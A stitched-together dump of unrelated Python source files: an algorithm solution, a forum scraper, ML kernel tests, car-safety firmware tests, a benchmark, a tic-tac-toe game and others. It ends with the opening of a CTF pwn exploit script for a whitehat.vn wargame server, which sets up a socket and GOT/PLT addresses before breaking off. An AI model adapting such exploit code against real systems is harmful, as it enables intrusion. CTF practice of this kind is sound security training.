来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/flood-fill
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
import collections
from typing import List
class Solution:
def floodFill(
self, image: List[List[int]], sr: int, sc: int, newColor: int
) -> List[List[int]]:
curColor = image[sr][sc]
if curColor == newColor:
return image
n, m = len(image), len(image[0])
que = collections.deque([(sr, sc)])
image[sr][sc] = newColor
while que:
(x, y) = que.popleft()
for mx, my in [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)]:
if 0 <= mx < n and 0 <= my < m and image[mx][my] == curColor:
que.append((mx, my))
image[mx][my] = newColor
return image
if __name__ == "__main__":
image = [[1, 1, 1], [1, 1, 0], [1, 0, 1]]
sr = 1
sc = 1
newColor = 2
print(
"Input: image = {}, sr = {}, sc = {}, newColor = {}".format(
image, sr, sc, newColor
)
)
print("Output:", Solution().floodFill(image, sr, sc, newColor))
| 4.34375 | 4 |
month05/Spider/day01_course/day01_code/05_tieba_spider.py | chaofan-zheng/python_learning_code | 0 | 12762520 | import time
import random
import requests
# def tieba_spider(keyword, page_start, page_end):
# url = 'https://tieba.baidu.com/f?kw={}&ie=utf-8&pn={}'
# headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'
# ' AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1'}
# for page in range(page_start, page_end):
# res = requests.get(url=url.format(keyword, (page - 1) * 50), headers=headers).content.decode(encoding='utf8',
# errors='ignore')
# filename = './tieba/{}吧_第{}页.html'.format(keyword, page)
# with open(filename, 'w') as f:
# f.write(res)
#
#
# keyword = input('关键字')
# page_start = input('开始页')
# page_end = input('结束页')
# print(keyword,page_start,page_end)
# tieba_spider(keyword, page_start, page_end)
class TieBaSpider:
def __init__(self):
self.url = url = 'https://tieba.baidu.com/f?kw={}&ie=utf-8&pn={}'
self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'
' AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1'}
def get_html(self, url):
"""请求函数"""
html = requests.get(url=url, headers=self.headers).text
return html
def parse_html(self):
"""解析函数"""
pass
def save_html(self, filename, html):
"""数据处理"""
with open(filename, 'w') as f:
f.write(html)
def crawl(self):
"""爬虫逻辑函数"""
name = input('贴吧名:')
start = int(input('开始页'))
end = int(input('结束页'))
for page in range(start, end + 1):
url = self.url.format(name, (page - 1) * 50)
html = self.get_html(url)
filename = './tieba/{}吧_第{}页.html'.format(name, page)
self.save_html(filename, html)
time.sleep(random.randint(1, 3))
if __name__ == '__main__':
spider = TieBaSpider()
spider.crawl()
| 2.765625 | 3 |
tests/common/test_run/ascend/five2four_run.py | tianjiashuo/akg | 286 | 12762521 | <reponame>tianjiashuo/akg
# Copyright 2019-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from tests.common.tensorio import compare_tensor
from akg.utils import kernel_exec as utils
from akg.ops.array.ascend import Five2Four
from akg import tvm
from tests.common.base import get_rtol_atol
from tests.common.gen_random import random_gaussian
import math
def compute_blockdim(shape):
size = 1
if isinstance(shape, (list, tuple)):
for i in shape:
size = size * i
elif isinstance(shape, int):
size = shape
else:
size = 2
return min(32, math.ceil(size / 16384))
def five2four_execute(shape4d, out_dtype, format, dtype, attrs):
# Generate data
op_attrs = [shape4d, out_dtype, format]
if attrs is None:
attrs = {}
if 'tuning' in attrs.keys():
t = attrs.get("tuning", False)
kernel_name = attrs.get("kernel_name", False)
input, bench_mark = gen_data(shape4d, dtype, out_dtype, format)
shape_5d = input.shape
mod = five2four_compile(shape_5d, dtype, op_attrs, attrs, kernel_name=kernel_name, tuning=t)
if t:
output = np.full(shape4d, np.nan, out_dtype)
return mod, bench_mark, (input, output)
else:
return mod
else:
input, bench_mark = gen_data(shape4d, dtype, out_dtype, format)
# mod launch
shape_5d = input.shape
mod = five2four_compile(shape_5d, dtype, op_attrs, attrs)
output = np.full(shape4d, np.nan, out_dtype)
args = [input, output]
# if attrs.get("dynamic"):
# for i in range(len(shape4d) - 1, -1, -1):
# args.append(shape4d[i])
if attrs.get("dynamic"):
args.append(shape_5d[0])
args.append(shape_5d[1])
args.append(shape_5d[4])
block_dim = compute_blockdim(shape4d)
args.append(block_dim)
output = utils.mod_launch(mod, args, outputs=(1,), expect=bench_mark)
# compare result
rtol, atol = get_rtol_atol("five2four", dtype)
compare_result = compare_tensor(output, bench_mark, rtol=rtol, atol=atol, equal_nan=True)
return input, output, bench_mark, compare_result
def five2four_compile(shape_5d, dtype, op_attrs, attrs, kernel_name='five2four', tuning=False):
if attrs.get("dynamic"):
var_shape = []
shape4d, dst_type, _ = op_attrs
channel_idx = 1
for i in range(len(shape_5d)):
if shape_5d[i] == 1:
var_shape.append(shape_5d[i])
else:
var_shape.append(tvm.var("I" + str(i)))
build_shape = var_shape
else:
build_shape = shape_5d
return utils.op_build_test(Five2Four, [build_shape], [dtype], op_attrs, kernel_name=kernel_name, attrs=attrs, tuning=tuning)
def gen_data(shape, dtype, out_dtype, format):
bench_mark = random_gaussian(shape, miu=1, sigma=0.3).astype(dtype)
if format == 'NCHW':
n, c, h, w = shape
if c % 16 != 0:
pad_input_shape = [n, c, h, w]
pad_c = (c + 15) // 16 * 16
pad_input_shape[1] = pad_c
pad_input = np.zeros(pad_input_shape).astype(dtype)
pad_input[:, :c, :, :] = bench_mark
new_shape = [n, pad_c // 16, 16, h, w]
input = pad_input.reshape(new_shape).transpose(0, 1, 3, 4, 2)
else:
new_shape = [n, c // 16, 16, h, w]
input = bench_mark.reshape(new_shape).transpose(0, 1, 3, 4, 2)
elif format == 'NHWC':
n, h, w, c = shape
if c % 16 != 0:
pad_input_shape = [n, h, w, c]
pad_c = (c + 15) // 16 * 16
pad_input_shape[3] = pad_c
pad_input = np.zeros(pad_input_shape).astype(dtype)
pad_input[:, :, :, :c] = bench_mark
new_shape = [n, h, w, pad_c // 16, 16]
input = pad_input.reshape(new_shape).transpose(0, 3, 1, 2, 4)
else:
new_shape = [n, h, w, c // 16, 16]
input = bench_mark.reshape(new_shape).transpose(0, 3, 1, 2, 4)
bench_mark = bench_mark.astype(out_dtype)
return input, bench_mark
| 1.835938 | 2 |
micropython-maixpy-0_6_2-66/stubs/cmath.py | mongonta0716/stub_for_maixpy | 1 | 12762522 | """
Module: 'cmath' on micropython-maixpy-0.6.2-66
"""
# MCU: {'ver': '0.6.2-66', 'build': '66', 'sysname': 'MaixPy', 'platform': 'MaixPy', 'version': '0.6.2', 'release': '0.6.2', 'port': 'MaixPy', 'family': 'micropython', 'name': 'micropython', 'machine': 'Sipeed_M1 with kendryte-k210', 'nodename': 'MaixPy'}
# Stubber: 1.3.9
def cos():
pass
e = 2.718282
def exp():
pass
def log():
pass
def log10():
pass
def phase():
pass
pi = 3.141593
def polar():
pass
def rect():
pass
def sin():
pass
def sqrt():
pass
| 2 | 2 |
tests/safety/common.py | Vaggysag/panda | 0 | 12762523 | <gh_stars>0
import abc
import struct
import unittest
from opendbc.can.packer import CANPacker # pylint: disable=import-error
from panda.tests.safety import libpandasafety_py
MAX_WRONG_COUNTERS = 5
class UNSAFE_MODE:
DEFAULT = 0
DISABLE_DISENGAGE_ON_GAS = 1
DISABLE_STOCK_AEB = 2
RAISE_LONGITUDINAL_LIMITS_TO_ISO_MAX = 8
def twos_comp(val, bits):
if val >= 0:
return val
else:
return (2**bits) + val
def package_can_msg(msg):
addr, _, dat, bus = msg
rdlr, rdhr = struct.unpack('II', dat.ljust(8, b'\x00'))
ret = libpandasafety_py.ffi.new('CAN_FIFOMailBox_TypeDef *')
if addr >= 0x800:
ret[0].RIR = (addr << 3) | 5
else:
ret[0].RIR = (addr << 21) | 1
ret[0].RDTR = len(dat) | ((bus & 0xF) << 4)
ret[0].RDHR = rdhr
ret[0].RDLR = rdlr
return ret
def make_msg(bus, addr, length=8):
return package_can_msg([addr, 0, b'\x00'*length, bus])
def interceptor_msg(gas, addr):
to_send = make_msg(0, addr, 6)
gas2 = gas * 2
to_send[0].RDLR = ((gas & 0xff) << 8) | ((gas & 0xff00) >> 8) | \
((gas2 & 0xff) << 24) | ((gas2 & 0xff00) << 8)
return to_send
class CANPackerPanda(CANPacker):
def make_can_msg_panda(self, name_or_addr, bus, values, counter=-1):
msg = self.make_can_msg(name_or_addr, bus, values, counter=-1)
return package_can_msg(msg)
class PandaSafetyTest(unittest.TestCase):
TX_MSGS = None
STANDSTILL_THRESHOLD = None
RELAY_MALFUNCTION_ADDR = None
RELAY_MALFUNCTION_BUS = None
FWD_BLACKLISTED_ADDRS = {} # {bus: [addr]}
FWD_BUS_LOOKUP = {}
@classmethod
def setUpClass(cls):
if cls.__name__ == "PandaSafetyTest":
cls.safety = None
raise unittest.SkipTest
def _rx(self, msg):
return self.safety.safety_rx_hook(msg)
def _tx(self, msg):
return self.safety.safety_tx_hook(msg)
@abc.abstractmethod
def _brake_msg(self, brake):
pass
@abc.abstractmethod
def _speed_msg(self, speed):
pass
@abc.abstractmethod
def _gas_msg(self, speed):
pass
# ***** standard tests for all safety modes *****
def test_relay_malfunction(self):
# each car has an addr that is used to detect relay malfunction
# if that addr is seen on specified bus, triggers the relay malfunction
# protection logic: both tx_hook and fwd_hook are expected to return failure
self.assertFalse(self.safety.get_relay_malfunction())
self._rx(make_msg(self.RELAY_MALFUNCTION_BUS, self.RELAY_MALFUNCTION_ADDR, 8))
self.assertTrue(self.safety.get_relay_malfunction())
for a in range(1, 0x800):
for b in range(0, 3):
self.assertFalse(self._tx(make_msg(b, a, 8)))
self.assertEqual(-1, self.safety.safety_fwd_hook(b, make_msg(b, a, 8)))
def test_fwd_hook(self):
# some safety modes don't forward anything, while others blacklist msgs
for bus in range(0x0, 0x3):
for addr in range(0x1, 0x800):
# assume len 8
msg = make_msg(bus, addr, 8)
fwd_bus = self.FWD_BUS_LOOKUP.get(bus, -1)
if bus in self.FWD_BLACKLISTED_ADDRS and addr in self.FWD_BLACKLISTED_ADDRS[bus]:
fwd_bus = -1
self.assertEqual(fwd_bus, self.safety.safety_fwd_hook(bus, msg))
def test_spam_can_buses(self):
for addr in range(1, 0x800):
for bus in range(0, 4):
if all(addr != m[0] or bus != m[1] for m in self.TX_MSGS):
self.assertFalse(self._tx(make_msg(bus, addr, 8)))
def test_default_controls_not_allowed(self):
self.assertFalse(self.safety.get_controls_allowed())
def test_manually_enable_controls_allowed(self):
self.safety.set_controls_allowed(1)
self.assertTrue(self.safety.get_controls_allowed())
self.safety.set_controls_allowed(0)
self.assertFalse(self.safety.get_controls_allowed())
def test_prev_gas(self):
for pressed in [True, False]:
self._rx(self._gas_msg(pressed))
self.assertEqual(pressed, self.safety.get_gas_pressed_prev())
def test_allow_engage_with_gas_pressed(self):
self._rx(self._gas_msg(1))
self.safety.set_controls_allowed(True)
self._rx(self._gas_msg(1))
self.assertTrue(self.safety.get_controls_allowed())
self._rx(self._gas_msg(1))
self.assertTrue(self.safety.get_controls_allowed())
def test_disengage_on_gas(self):
self._rx(self._gas_msg(0))
self.safety.set_controls_allowed(True)
self._rx(self._gas_msg(1))
self.assertFalse(self.safety.get_controls_allowed())
def test_unsafe_mode_no_disengage_on_gas(self):
self._rx(self._gas_msg(0))
self.safety.set_controls_allowed(True)
self.safety.set_unsafe_mode(UNSAFE_MODE.DISABLE_DISENGAGE_ON_GAS)
self._rx(self._gas_msg(1))
self.assertTrue(self.safety.get_controls_allowed())
def test_allow_brake_at_zero_speed(self):
# Brake was already pressed
self._rx(self._speed_msg(0))
self._rx(self._brake_msg(1))
self.safety.set_controls_allowed(1)
self._rx(self._brake_msg(1))
self.assertTrue(self.safety.get_controls_allowed())
self._rx(self._brake_msg(0))
self.assertTrue(self.safety.get_controls_allowed())
# rising edge of brake should disengage
self._rx(self._brake_msg(1))
self.assertFalse(self.safety.get_controls_allowed())
self._rx(self._brake_msg(0)) # reset no brakes
def test_not_allow_brake_when_moving(self):
# Brake was already pressed
self._rx(self._brake_msg(1))
self.safety.set_controls_allowed(1)
self._rx(self._speed_msg(self.STANDSTILL_THRESHOLD))
self._rx(self._brake_msg(1))
self.assertTrue(self.safety.get_controls_allowed())
self._rx(self._speed_msg(self.STANDSTILL_THRESHOLD + 1))
self._rx(self._brake_msg(1))
self.assertFalse(self.safety.get_controls_allowed())
self._rx(self._speed_msg(0))
# TODO: use PandaSafetyTest for all tests and delete this
class StdTest:
@staticmethod
def test_relay_malfunction(test, addr, bus=0):
# input is a test class and the address that, if seen on specified bus, triggers
# the relay_malfunction protection logic: both tx_hook and fwd_hook are
# expected to return failure
test.assertFalse(test.safety.get_relay_malfunction())
test.safety.safety_rx_hook(make_msg(bus, addr, 8))
test.assertTrue(test.safety.get_relay_malfunction())
for a in range(1, 0x800):
for b in range(0, 3):
test.assertFalse(test.safety.safety_tx_hook(make_msg(b, a, 8)))
test.assertEqual(-1, test.safety.safety_fwd_hook(b, make_msg(b, a, 8)))
@staticmethod
def test_manually_enable_controls_allowed(test):
test.safety.set_controls_allowed(1)
test.assertTrue(test.safety.get_controls_allowed())
test.safety.set_controls_allowed(0)
test.assertFalse(test.safety.get_controls_allowed())
@staticmethod
def test_spam_can_buses(test, TX_MSGS):
for addr in range(1, 0x800):
for bus in range(0, 4):
if all(addr != m[0] or bus != m[1] for m in TX_MSGS):
test.assertFalse(test.safety.safety_tx_hook(make_msg(bus, addr, 8)))
@staticmethod
def test_allow_brake_at_zero_speed(test):
# Brake was already pressed
test.safety.safety_rx_hook(test._speed_msg(0))
test.safety.safety_rx_hook(test._brake_msg(1))
test.safety.set_controls_allowed(1)
test.safety.safety_rx_hook(test._brake_msg(1))
test.assertTrue(test.safety.get_controls_allowed())
test.safety.safety_rx_hook(test._brake_msg(0))
test.assertTrue(test.safety.get_controls_allowed())
# rising edge of brake should disengage
test.safety.safety_rx_hook(test._brake_msg(1))
test.assertFalse(test.safety.get_controls_allowed())
test.safety.safety_rx_hook(test._brake_msg(0)) # reset no brakes
@staticmethod
def test_not_allow_brake_when_moving(test, standstill_threshold):
# Brake was already pressed
test.safety.safety_rx_hook(test._brake_msg(1))
test.safety.set_controls_allowed(1)
test.safety.safety_rx_hook(test._speed_msg(standstill_threshold))
test.safety.safety_rx_hook(test._brake_msg(1))
test.assertTrue(test.safety.get_controls_allowed())
test.safety.safety_rx_hook(test._speed_msg(standstill_threshold + 1))
test.safety.safety_rx_hook(test._brake_msg(1))
test.assertFalse(test.safety.get_controls_allowed())
test.safety.safety_rx_hook(test._speed_msg(0))
| 2.171875 | 2 |
asv_bench/benchmarks/io/style.py | umangino/pandas | 28,899 | 12762524 | import numpy as np
from pandas import (
DataFrame,
IndexSlice,
)
class Render:
params = [[12, 24, 36], [12, 120]]
param_names = ["cols", "rows"]
def setup(self, cols, rows):
self.df = DataFrame(
np.random.randn(rows, cols),
columns=[f"float_{i+1}" for i in range(cols)],
index=[f"row_{i+1}" for i in range(rows)],
)
def time_apply_render(self, cols, rows):
self._style_apply()
self.st._render_html(True, True)
def peakmem_apply_render(self, cols, rows):
self._style_apply()
self.st._render_html(True, True)
def time_classes_render(self, cols, rows):
self._style_classes()
self.st._render_html(True, True)
def peakmem_classes_render(self, cols, rows):
self._style_classes()
self.st._render_html(True, True)
def time_tooltips_render(self, cols, rows):
self._style_tooltips()
self.st._render_html(True, True)
def peakmem_tooltips_render(self, cols, rows):
self._style_tooltips()
self.st._render_html(True, True)
def time_format_render(self, cols, rows):
self._style_format()
self.st._render_html(True, True)
def peakmem_format_render(self, cols, rows):
self._style_format()
self.st._render_html(True, True)
def time_apply_format_hide_render(self, cols, rows):
self._style_apply_format_hide()
self.st._render_html(True, True)
def peakmem_apply_format_hide_render(self, cols, rows):
self._style_apply_format_hide()
self.st._render_html(True, True)
def _style_apply(self):
def _apply_func(s):
return [
"background-color: lightcyan" if s.name == "row_1" else "" for v in s
]
self.st = self.df.style.apply(_apply_func, axis=1)
def _style_classes(self):
classes = self.df.applymap(lambda v: ("cls-1" if v > 0 else ""))
classes.index, classes.columns = self.df.index, self.df.columns
self.st = self.df.style.set_td_classes(classes)
def _style_format(self):
ic = int(len(self.df.columns) / 4 * 3)
ir = int(len(self.df.index) / 4 * 3)
# apply a formatting function
# subset is flexible but hinders vectorised solutions
self.st = self.df.style.format(
"{:,.3f}", subset=IndexSlice["row_1":f"row_{ir}", "float_1":f"float_{ic}"]
)
def _style_apply_format_hide(self):
self.st = self.df.style.applymap(lambda v: "color: red;")
self.st.format("{:.3f}")
self.st.hide_index(self.st.index[1:])
self.st.hide_columns(self.st.columns[1:])
def _style_tooltips(self):
ttips = DataFrame("abc", index=self.df.index[::2], columns=self.df.columns[::2])
self.st = self.df.style.set_tooltips(ttips)
self.st.hide_index(self.st.index[12:])
self.st.hide_columns(self.st.columns[12:])
| 2.6875 | 3 |
morpion.py | revaxl/tictactoe | 0 | 12762525 | <reponame>revaxl/tictactoe<filename>morpion.py
grid = []
# create an empty grid
def init():
for i in range(3):
grid.append([])
for j in range(3):
grid[i].append('_')
# print the grid on screen
def affiche(grid):
for j in ['A', 'B', 'C']:
print(' ',j, sep=' ', end=' ')
print('')
for i in range(len(grid)):
print(i+1, grid[i])
# check if the user input is valid
def casevide(grid, i, j):
try:
if grid[i][j] == '_':
return True
else:
return False
except IndexError:
return False
# get the user input and place X on the location choosen by the user
# if the validation is OK
def choixjoueur(grid):
choix = input('select a place ')
[i,j] = choix
i = int(i) - 1
if j.lower() == 'a': j = 0
elif j.lower() == 'b': j = 1
elif j.lower() == 'c': j = 2
else: j = 0
print(i,j)
if casevide(grid, i, j) == True:
grid[i][j] = 'X'
else:
print('wrong place, choose again')
choixjoueur(grid)
def choixmachine(grid):
import random as rd
while True:
i = rd.randint(0,3) # generate a random number for row
j = rd.randint(0,3) # generate a random number for column
if casevide(grid, i, j) == True:
print(i,j)
grid[i][j] = 'O'
break
# check if the grid is full or not
def gridplein(grid):
for i in range(len(grid)):
if '_' in grid[i]:
return False
return True
# check the grid for winner every turn
# compare each point in the grid to the points next to it
# if the points has the same X or O then declare winner and exit
def winner(grid, char):
for i in range(len(grid)):
for j in range(len(grid[i])):
# check for horizantal alignement (X-X-X or O-O-O)
if j == 0:
if char == grid[i][j] and char == grid[i][j+1] and char == grid[i][j+2]:
return True
if j == 1:
if char == grid[i][j] and char == grid[i][j-1] and char == grid[i][j+1]:
return True
if j == 1:
if char == grid[i][j] and char == grid[i][j-1] and char == grid[i][j-2]:
return True
# check for vertical alignement
# X or O
# X or O
# X or O
if i == 0:
if char == grid[i] and char == grid[i+1] and char == grid[i+2]:
return True
if i == 1:
if char == grid[i] and char == grid[i-1] and char == grid[i+1]:
return True
if i == 1:
if char == grid[i] and char == grid[i-1] and char == grid[i-2]:
True
init()
while True:
choixjoueur(grid)
if winner(grid, 'X') == True:
affiche(grid)
print('Winner => user')
break
choixmachine(grid)
if gridplein(grid) == False:
if winner(grid, 'O') == True:
print('Winner => computer')
break
affiche(grid)
else:
affiche(grid)
print('No Winner')
break
| 3.984375 | 4 |
research/slim/autoencoders/nets_bm/alexnet/alexnet_bm.py | Dzinushi/models_1_4 | 0 | 12762526 | <reponame>Dzinushi/models_1_4
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains a model definition for AlexNet.
This work was first described in:
ImageNet Classification with Deep Convolutional Neural Networks
<NAME>, <NAME> and <NAME>
and later refined in:
One weird trick for parallelizing convolutional neural networks
<NAME>, 2014
Here we provide the implementation proposed in "One weird trick" and not
"ImageNet Classification", as per the paper, the LRN layers have been removed.
Usage:
with slim.arg_scope(alexnet.alexnet_v2_arg_scope()):
outputs, end_points = alexnet.alexnet_v2(inputs)
@@alexnet_v2
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from collections import OrderedDict
from autoencoders.ae_utils import sdc_conv_block, set_model_losses, scope_with_sdc
from tensorflow.contrib import slim
trunc_normal = lambda stddev: tf.truncated_normal_initializer(0.0, stddev)
dconv = '_dconv2d'
def alexnet_v2(inputs,
scope='alexnet_v2',
sdc_num=1,
train_block_num=0,
channel=3,
activation_fn=tf.nn.relu):
"""AlexNet version 2.
Described in: http://arxiv.org/pdf/1404.5997v2.pdf
Parameters from:
github.com/akrizhevsky/cuda-convnet2/blob/master/layers/
layers-imagenet-1gpu.cfg
Note: All the fully_connected layers have been transformed to conv2d layers.
To use in classification mode, resize input to 224x224 or set
global_pool=True. To use in fully convolutional mode, set
spatial_squeeze to false.
The LRN layers have been removed and change the initializers from
random_normal_initializer to xavier_initializer.
Args:
inputs: a tensor of size [batch_size, height, width, channels].
spatial_squeeze: whether or not should squeeze the spatial dimensions of the
logits. Useful to remove unnecessary dimensions for classification.
scope: Optional scope for the variables.
global_pool: Optional boolean flag. If True, the input to the classification
layer is avgpooled to size 1x1, for any input size. (This is not part
of the original AlexNet.)
Returns:
net: the output of the logits layer (if num_classes is a non-zero integer),
or the non-dropped-out input to the logits layer (if num_classes is 0
or None).
end_points: a dict of tensors with intermediate activations.
"""
trainable_fn = lambda train_block_num, block_num: block_num == train_block_num
with tf.variable_scope(scope, 'alexnet_v2', [inputs]):
# Collect outputs for conv2d, fully_connected and max_pool2d.
net = inputs
end_points = OrderedDict()
end_points[scope_with_sdc('input', 0)] = net
# SDC 0
if trainable_fn(train_block_num, 0):
pad = 'VALID'
stride = 4
net, end_points = sdc_conv_block(end_points, net,
num_outputs=64,
num_sdc_outputs=channel,
kernel_size=[11, 11],
stride=stride,
padding=pad,
activation=activation_fn,
activation_sdc=activation_fn,
sdc_num=sdc_num,
scope_conv='conv1',
scope_dconv='input')
return net, end_points, pad, stride
else:
layer_scope = 'conv1'
net = slim.conv2d(inputs, 64, [11, 11], 4, activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, padding='VALID',
scope=layer_scope)
end_points[scope_with_sdc(layer_scope, 0)] = net
layer_scope = 'pool1'
end_points[scope_with_sdc(layer_scope, 0)] = net = slim.max_pool2d(net, [3, 3], stride=2, scope=layer_scope)
# SDC 1
pad = 'SAME'
stride = 1
if trainable_fn(train_block_num, 1):
net, end_points = sdc_conv_block(end_points,
net,
num_outputs=192,
num_sdc_outputs=64,
kernel_size=[5, 5],
activation=activation_fn,
activation_sdc=activation_fn,
sdc_num=sdc_num,
scope_conv='conv2',
scope_dconv='pool1')
return net, end_points, pad, stride
else:
layer_scope = 'conv2'
net = slim.conv2d(net, 192, [5, 5], activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, scope='conv2')
end_points[scope_with_sdc(layer_scope, 0)] = net
layer_scope = 'pool2'
end_points[scope_with_sdc(layer_scope, 0)] = net = slim.max_pool2d(net, [3, 3], stride=2, scope=layer_scope)
# SDC 2
if trainable_fn(train_block_num, 2):
net, end_points = sdc_conv_block(end_points,
net,
num_outputs=384,
num_sdc_outputs=192,
kernel_size=[3, 3],
activation=activation_fn,
activation_sdc=activation_fn,
sdc_num=sdc_num,
scope_conv='conv3',
scope_dconv='pool2')
return net, end_points, pad, stride
else:
layer_scope = 'conv3'
end_points[scope_with_sdc(layer_scope, 0)] = net = \
slim.conv2d(net, 384, [3, 3], activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, scope=layer_scope)
# SDC 3
if trainable_fn(train_block_num, 3):
net, end_points = sdc_conv_block(end_points,
net,
num_outputs=384,
num_sdc_outputs=384,
kernel_size=[3, 3],
activation=activation_fn,
activation_sdc=activation_fn,
sdc_num=sdc_num,
scope_conv='conv4',
scope_dconv='conv3')
return net, end_points, pad, stride
else:
layer_scope = 'conv4'
end_points[scope_with_sdc(layer_scope, 0)] = net = \
slim.conv2d(net, 384, [3, 3], activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, scope=layer_scope)
# SDC 4
if trainable_fn(train_block_num, 4):
net, end_points = sdc_conv_block(end_points,
net,
num_outputs=256,
num_sdc_outputs=384,
kernel_size=[3, 3],
activation=activation_fn,
activation_sdc=activation_fn,
sdc_num=sdc_num,
scope_conv='conv5',
scope_dconv='conv4')
return net, end_points, pad, stride
else:
layer_scope = 'conv5'
end_points[scope_with_sdc(layer_scope, 0)] = net = \
slim.conv2d(net, 256, [3, 3], activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, scope=layer_scope)
layer_scope = 'pool5'
end_points[scope_with_sdc(layer_scope, 0)] = net = slim.max_pool2d(net, [3, 3], 2, scope=layer_scope)
# SDC 5
if trainable_fn(train_block_num, 5):
pad = 'VALID'
net, end_points = sdc_conv_block(end_points,
net,
num_outputs=4096,
num_sdc_outputs=256,
kernel_size=[5, 5],
sdc_num=sdc_num,
padding=pad,
weights_initializer=trunc_normal(0.005),
biases_initializer=tf.constant_initializer(0.1),
activation=activation_fn,
activation_sdc=activation_fn,
scope_conv='fc6',
scope_dconv='pool5')
return net, end_points, pad, stride
else:
layer_scope = 'fc6'
end_points[scope_with_sdc(layer_scope, 0)] = net = \
slim.conv2d(net, 4096, [5, 5], activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, padding=pad, scope=layer_scope)
# SDC 6
if trainable_fn(train_block_num, 6):
pad = 'VALID'
net, end_points = sdc_conv_block(end_points,
net,
num_outputs=4096,
num_sdc_outputs=4096,
kernel_size=[1, 1],
sdc_num=sdc_num,
activation=activation_fn,
activation_sdc=activation_fn,
weights_initializer=trunc_normal(0.005),
biases_initializer=tf.constant_initializer(0.1),
scope_conv='fc7',
scope_dconv='fc6')
return net, end_points, pad, stride
else:
layer_scope = 'fc7'
end_points[scope_with_sdc(layer_scope, 0)] = net = \
slim.conv2d(net, 4096, [1, 1], activation_fn=activation_fn, trainable=False, reuse=tf.AUTO_REUSE, scope=layer_scope)
return net, end_points
alexnet_v2.default_image_size = 223
alexnet_v2.block_number = 7
def alexnet_model_losses(end_points, train_block_num=0, sdc_num=1):
layers_scope = {0: ['input', 'conv1'],
1: ['pool1', 'conv2'],
2: ['pool2', 'conv3'],
3: ['conv3', 'conv4'],
4: ['conv4', 'conv5'],
5: ['pool5', 'fc6'],
6: ['fc6', 'fc7']}
return set_model_losses(end_points, layers_scope[train_block_num], sdc_num)
| 2.453125 | 2 |
nevergrad/functions/photonics/test_core.py | donghun2018/nevergrad | 0 | 12762527 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import List
from unittest.mock import patch
from unittest import TestCase
import genty
import numpy as np
from . import core
@genty.genty
class BenchmarkTests(TestCase):
@genty.genty_dataset( # type: ignore
bragg=("bragg", [2.93, 2.18, 2.35, 2.12, 31.53, 15.98, 226.69, 193.11]),
morpho=("morpho", [280.36, 52.96, 208.16, 72.69, 89.92, 60.37, 226.69, 193.11]),
chirped=("chirped", [280.36, 52.96, 104.08, 36.34, 31.53, 15.98, 226.69, 193.11]),
)
def test_photonics_transforms(self, pb: str, expected: List[float]) -> None:
np.random.seed(24)
with patch("shutil.which", return_value="here"):
func = core.Photonics(pb, 16) # should be 8... but it is actually not allowed. Nevermind here
x = np.random.normal(0, 1, size=8)
output = func.transform(x)
np.testing.assert_almost_equal(output, expected, decimal=2)
np.random.seed(24)
x2 = np.random.normal(0, 1, size=8)
np.testing.assert_almost_equal(x, x2, decimal=2, err_msg="x was modified in the process")
def test_tanh_crop() -> None:
output = core.tanh_crop([-1e9, 1e9, 0], -12, 16)
np.testing.assert_almost_equal(output, [-12, 16, 2])
def test_morpho_transform_constraints() -> None:
with patch("shutil.which", return_value="here"):
func = core.Photonics("morpho", 60)
x = np.random.normal(0, 5, size=60) # std 5 to play with boundaries
output = func.transform(x)
assert np.all(output >= 0)
q = len(x) // 4
assert np.all(output[:q] <= 300)
assert np.all(output[q: 3 * q] <= 600)
assert np.all(output[2 * q: 3 * q] >= 30)
assert np.all(output[3 * q:] <= 300)
def test_photonics() -> None:
with patch("shutil.which", return_value="here"):
photo = core.Photonics("bragg", 16)
with patch("nevergrad.instrumentation.utils.CommandFunction.__call__", return_value="line1\n12\n"):
with patch("nevergrad.instrumentation.utils.CommandFunction.__call__", return_value="line1\n12\n"):
output = photo(np.zeros(16))
np.testing.assert_equal(output, 12)
# check error
with patch("nevergrad.instrumentation.utils.CommandFunction.__call__", return_value="line1\n"):
np.testing.assert_raises(RuntimeError, photo, np.zeros(16).tolist())
np.testing.assert_raises(AssertionError, photo, np.zeros(12).tolist())
| 2.140625 | 2 |
whitehat.vn/pwn/pwn002/exploit.py | anarcheuz/CTF | 2 | 12762528 | import struct
import socket
import time
def p(a):
return struct.pack("<Q", a)
def u(a):
return struct.unpack("<Q", a)[0]
def recv_until(sock, s="\n"):
res = ""
while 1:
res += sock.recv(1)
if res.endswith(s):
break
return res
s = socket.create_connection(('lab30.wargame.whitehat.vn', 7002))
#s = socket.create_connection(('localhost', 4444))
puts_got = 0x601018
puts_plt = 0x4005d0
read_plt = 0x4005f0
